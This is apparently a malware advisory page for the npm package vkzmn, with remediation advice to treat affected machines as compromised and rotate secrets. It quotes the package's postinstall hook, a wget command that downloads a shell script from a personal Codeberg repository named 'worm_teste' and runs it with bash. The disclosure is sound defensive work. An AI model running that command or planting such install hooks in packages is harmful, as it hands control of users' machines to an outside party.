VDB
KO

MAL-2026-6594

Malicious code in vkzmn (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (dc2e10775ac70e6f3b083ac0a76374e09e11cac7b06068a4bd3b6114f796a0df) package.json declares a postinstall lifecycle hook that runs `wget https://codeberg.org/atilalogical/worm_teste/raw/branch/main/down_procwork.sh -O d.sh; bash d.sh`, downloading a shell script from a mutable branch of an unrelated personal Codeberg repository named `worm_teste` and executing it via bash on the installer's machine at `npm install` time. The fetched script is unpinned (mutable `main` branch), unverified (no hash/signature check), and from a destination that bears no relationship to any declared package purpose — the source repository name itself indicates worm/propagation testing. Whatever bytes the repository owner serves at fetch time execute with the privileges of the user running `npm install`. The package additionally declares a self-referential dependency (`vkzmn: ^1.0.4`), consistent with propagation scaffolding rather than a legitimate library.

## Source: ghsa-malware (a41dc023cd84c69935ac2c642d6cb9c187fb6bce9c18d226d785fba49e80e50a) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / vkzmn
Introduced in: 0

No fixed version published yet for vkzmn (npm). Pin to a known-safe version or switch to an alternative.

References